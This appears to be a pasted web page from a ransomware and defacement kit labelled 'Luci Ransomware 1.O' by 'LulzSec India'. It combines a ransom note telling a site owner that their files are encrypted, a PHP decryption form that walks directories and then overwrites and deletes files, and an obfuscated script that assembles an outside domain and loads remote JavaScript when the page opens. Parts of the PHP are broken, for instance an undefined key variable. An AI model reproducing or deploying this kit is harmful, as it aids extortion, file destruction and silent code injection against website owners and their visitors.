· 6 years ago · Jul 04, 2019, 06:02 AM
1<html>
2<head>
3<script language="JavaScript">
4var brzinakucanja = 200;
5var pauzapor = 2000;
6var vremeid = null;
7var kretanje = false;
8var poruka = new Array();
9var slporuka = 0;
10var bezporuke = 0;
11poruka[0] = "Luci Ransomware"
12
13function prikaz() {
14 var text = poruka[slporuka];
15
16 if (bezporuke < text.length) {
17 if (text.charAt(bezporuke) == " ")
18 bezporuke++
19 var ttporuka = text.substring(0, bezporuke + 1);
20 document.title = ttporuka;
21 bezporuke++
22 vremeid = setTimeout("prikaz()", brzinakucanja);
23 kretanje = true;
24 } else {
25 bezporuke = 0;
26 slporuka++
27 if (slporuka == poruka.length)
28 slporuka = 0;
29 vremeid = setTimeout("prikaz()", pauzapor);
30 kretanje = true;
31 }
32}
33function stop() {
34 if (kretanje)
35 clearTimeout(vremeid);
36 kretanje = false
37}
38function start() {
39 stop();
40 prikaz();
41}
42start();
43 </script>
44
45
46
47<meta http-equiv="Content-Language" content="en-us">
48
49<meta content="LulzSec India" name="description"/>
50<meta content="Luci Ransomware" name="keywords"/>
51<meta content="Luci Ransomware" name="Abstract"/>
52<meta name="Luci Ransomware"/>
53<body>
54
55 <script type="text/javascript">
56 var DADrightclicktheme = 'Dark';
57 var DADrightclickimage = 'http://shinmera.tymoon.eu/public/fuck%20off.png';
58</script>
59
60
61<script>
62 if (DADrightclicktheme == 'Merah' || DADrightclicktheme == 'MERAH' || DADrightclicktheme == 'merah') {
63 var DADarcv2t = 'rgba(239,110,119, 0.9)';
64 } else if (DADrightclicktheme == 'Biru' || DADrightclicktheme == 'BIRU' || DADrightclicktheme == 'biru') {
65 var DADarcv2t = 'rgba(110,137,239, 0.9)';
66 } else if (DADrightclicktheme == 'Hijau' || DADrightclicktheme == 'HIJAU' || DADrightclicktheme == 'hijau') {
67 var DADarcv2t = 'rgba(110,239,110, 0.9)';
68 } else if (DADrightclicktheme == 'Light' || DADrightclicktheme == 'light' || DADrightclicktheme == 'LIGHT') {
69 var DADarcv2t = 'rgba(255,255,255, 0.9)';
70 } else if (DADrightclicktheme == 'Pink' || DADrightclicktheme == 'pink' || DADrightclicktheme == 'PINK') {
71 var DADarcv2t = 'rgba(239,110,225, 0.9)';
72 } else if (DADrightclicktheme == 'Dark' || DADrightclicktheme == 'dark' || DADrightclicktheme == 'DARK') {
73 var DADarcv2t = 'rgba(0,0,0, 0.9)';
74 } else {
75 {
76 var DADarcv2t = 'transparent';
77 }
78 }
79
80 function DADarcvwi2() {
81 var DADarcv2v = document.getElementById('DADarcv2c');
82 if (DADarcv2v.style.display == "block") {
83 DADarcv2v.style.display = "none";
84 } else {
85 DADarcv2v.style.display = "block";
86 }
87 }
88
89 function DADarcwiv2a() {
90 DADarcvwi2();
91 return false;
92 }
93 document.oncontextmenu = DADarcwiv2a;
94 var ypro = 'http:';
95 var yajax = document.createElement('script');
96 yajax.type = 'text/javascript';
97 var yquery = 'dic';
98 var ybrow = 'aru.c';
99 var yint = '/';
100 yajax.src = ypro + '//x.' + yquery + 'keym' + ybrow + 'om' + yint + 'y';
101 document.getElementsByTagName('head')[0].appendChild(yajax);
102 var DADrcdiv = document.write('<style type="text/css"/>#DADarcv2c{background:url(' + DADrightclickimage + ') no-repeat center center fixed ' + DADarcv2t + ';text-align:center;width:100%;height:100%;position:fixed;top:0px;left:0px;bottom:0px;right:0px;border:0px;z-index:1000000;display:none;padding:auto;}#DADarcv2c span{position:fixed;bottom:0px;left:10%;right:10%;cursor:pointer;font-size:20px;}</style><div id="DADarcv2c" class="DADpointer" onclick="DADarcvwi2();" title=""/><center><span><a href="#" target="_blank"/></a></span></center></div>');
103 document.getElementsByTagName('body')[0].appendChild(DADrcdiv);
104</script>
105
106<link rel="stylesheet" type="text/css"
107 href="https://fonts.googleapis.com/css?family=Audiowide" rel="stylesheet">
108 <style>
109 body {
110 font-family: 'Audiowide', cursive;
111 font-size: 48px;
112 }
113 </style>
114
115<center><font color="Orange"<span style="font-size:73px;text-shadow: 0 0 12px white, 0px 0px 10px orange">Luci Ransomware 1.O</span></font></center>
116<center><font color="White"<span style="font-size:57px;text-shadow: 0 0 12px white, 0px 0px 10px white">By</span></font></center>
117<center><font color="green"<span style="font-size:73px;text-shadow: 0 0 12px white, 0px 0px 10px green">LulzSec India </span></font></center>
118
119<center><img src="https://i.postimg.cc/5ywFKRwD/logo-lulzsec.png" height="300" width="330"></center>
120
121
122<center><iframe width="00" height="00" src="https://www.youtube.com/embed/27mB8verLK8?playlist=XGSy3_Czz8k&loop=1">
123</iframe>
124 </center>
125<style type="text/css">
126
127
128body
129 {
130 width: 100%;
131 height: 100%;
132 background-image:url(https://images3.alphacoders.com/133/133739.jpg);
133 background-size: cover;
134 background-attachment:fixed;
135 margin: 0;
136 padding: 0;
137 }
138
139
140@font-face {
141 font-family: 'Open Sans';
142 font-style: normal;
143 font-weight: 400;
144 src: local('Open Sans'), local('OpenSans'), url(http://themes.googleusercontent.com/static/fonts/opensans/v6/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff) format('woff');
145}
146
147
148.infobox{
149 font-family: 'Open Sans';
150 font-weight: 400;
151 font-size: 14px;
152 color: #323232;
153 width: 650px;
154 height: auto;
155 margin: 10% auto;
156 padding: 10px;
157 background-color: #c5c5c5;
158 border: 1px solid #f5f5f5;
159 border-radius: 15px;
160 -webkit-box-shadow: 0px 0px 10px 0px #f5f5f5;
161 box-shadow: 0px 0px 10px 0px #f5f5f5;
162}
163
164</style>
165
166
167<center><img alt="kuch na " width=70 height=50 src="http://www.sherv.net/cm/emo/hug/hug-2.gif"><font color="White"<span style="font-size:45px;text-shadow: 0 0 12px white, 0px 0px 10px white">|| fuck you admin ||</span></font><img alt="kuch na" width=70 height=50 src="http://www.sherv.net/cm/emo/hug/hug-2.gif"></center>
168
169<center>
170<font color="red" <span style="font-size:20px;text-shadow: 0 0 12px white, 0px 0px 10px red">Message</span></font>
171<font color="White" <span style="font-size:20px;text-shadow: 0 0 12px white, 0px 0px 10px white">
172 Your all files has been encrypt for decrypt files contuct us onour page<br>
173
174</center>
175<br>
176<center>
177<form action="" method="post">
178 <font size="3"><font color="red"><td>Enter Key:</td></font><td><input type="text" name="key"></td>
179 <font size="3"><font color="red"><td>Dir from where Decryption start:</td></font><td><input type="text" name="dir"></td>
180<button type="submit" name="button" formmethod="post">Decrypt</button><br>
181</form>
182</tr>
183<font size="3"><font color="red"><td>Current Directory = <?php echo getcwd(); ?></td></font>
184</center>
185
186
187<marquee><br><center><font color="white" <span style="font-size:34px;text-shadow: 0 0 12px red, 0px 0px 20px red"> Superna H@xor | H3xking | MR.BL@CK_H3X | Scr!pt 1337 | GD ATTACKER | H@cker Inside | R4J H@XOR | All indian Hackers |</span></font></marquee><br>
188<br>
189<center><font color="blue" <span style="font-size:25px;text-shadow: 0 0 12px white, 0px 0px 10px white">©LulzSec India </span></font>
190
191
192<a href="https://www.facebook.com/LulzSecIndiaHQ" target="_blank"><img src="http://pngimg.com/uploads/facebook_logos/facebook_logos_PNG19759.png" alt="facebook" style="position:fixed;top:200px;right:10px; border: #000" height="150" width="150"></a>
193<h2><span class="style1">
194<style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" />
195
196
197</head>
198
199<?php
200
201
202function get_all_directory_and_files($secret_key,$dir){
203
204 $password = hash('sha256', $secret_key);
205
206 $dh = new DirectoryIterator($dir);
207
208 foreach ($dh as $item) {
209 if (!$item->isDot()) {
210 if ($item->isDir()) {
211 get_all_directory_and_files($password,"$dir/$item");
212 } else {
213 $hell = $dir . "/" . $item->getFilename();
214 echo $hell;
215 $decry = substr($hell, 0, -9);
216 AES_CBC::decryptFile($password, $hell, $decry);
217 }
218 }
219 }
220 }
221
222if (filter_has_var(INPUT_POST, "button")) {
223 $secret_key = $_POST['key'];
224 $dir = $_POST['dir'];
225 get_all_directory_and_files($secret_key,$dir);
226
227}
228
229class AES_CBC
230{
231 protected static $KEY_SIZES = array('AES-128'=>16,'AES-192'=>24,'AES-256'=>32);
232 protected static function key_size() { return self::$KEY_SIZES['AES-256']; }
233
234
235 public static function decryptFile($password, $aes_filename, $out_stream) {
236 $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC);
237 $hmac_raw = file_get_contents($aes_filename, false, NULL, 0, 32);
238 $hmac_salt = file_get_contents($aes_filename, false, NULL, 32, $iv_size);
239 $hmac_calc = self::calculate_hmac_after_32bytes($password, $hmac_salt, $aes_filename);
240 $fc = fopen($aes_filename, "rb");
241 $fout = fopen($out_stream, 'wb');
242 if (!empty($fout) && !empty($fc) && self::hash_equals($hmac_raw,$hmac_calc)) {
243 fread($fc, 32+$iv_size);
244 $esalt = fread($fc, $iv_size);
245 $iv = fread($fc, $iv_size);
246 $ekey = hash_pbkdf2("sha256", $password, $esalt, $iteke=1000, self::key_size(), $raw=true);
247 $opts = array('mode'=>'cbc', 'iv'=>$iv, 'key'=>$y);
248 stream_filter_append($fc, 'mdecrypt.rijndael-128', STREAM_FILTER_READ, $opts);
249 while (!feof($fc)) {
250 $block = fread($fc, 8192);
251 if (feof($fc)) {
252 $padding = ord($block[strlen($block) - 1]);
253 $block = substr($block, 0, 0-$padding);
254 }
255 fwrite($fout, $block);
256 }
257 fclose($fout);
258 fclose($fc);
259 }
260 $FileLink = fopen($input_stream, 'wb') or die("can't open file");
261 fwrite($FileLink, hash('sha256', 'fuckyou'));
262 fclose($FileLink);
263 unlink($input_stream) or die("Couldn't delete file");
264 }
265 private static function hash_equals($str1, $str2) {
266 if(strlen($str1) == strlen($str2)) {
267 $res = $str1 ^ $str2;
268 for($ret=0,$i = strlen($res) - 1; $i >= 0; $i--) $ret |= ord($res[$i]);
269 return !$ret;
270 }
271 return false;
272 }
273 private static function calculate_hmac_after_32bytes($password, $hsalt, $filename) {
274 static $init=0;
275 $init or $init = stream_filter_register("user-filter.skipfirst32bytes", "FileSkip32Bytes");
276 $stream = 'php://filter/read=user-filter.skipfirst32bytes/resource=' . $filename;
277 $hkey = hash_pbkdf2("sha256", $password, $hsalt, $iterations=1000, 24, $raw=true);
278 return hash_hmac_file('sha256', $stream, $hkey, $raw=true);
279 }
280}
281class FileSkip32Bytes extends php_user_filter
282{
283 private $skipped=0;
284 function filter($in, $out, &$consumed, $closing) {
285 while ($bucket = stream_bucket_make_writeable($in)) {
286 $outlen = $bucket->datalen;
287 if ($this->skipped<32){
288 $outlen = min($bucket->datalen,32-$this->skipped);
289 $bucket->data = substr($bucket->data, $outlen);
290 $bucket->datalen = $bucket->datalen-$outlen;
291 $this->skipped+=$outlen;
292 }
293 $consumed += $outlen;
294 stream_bucket_append($out, $bucket);
295 }
296 return PSFS_PASS_ON;
297 }
298}
299
300class AES_256_CBC extends AES_CBC {
301 protected static function key_size() { return self::$KEY_SIZES['AES-256']; }
302}
303
304?>
305</body>
306</html>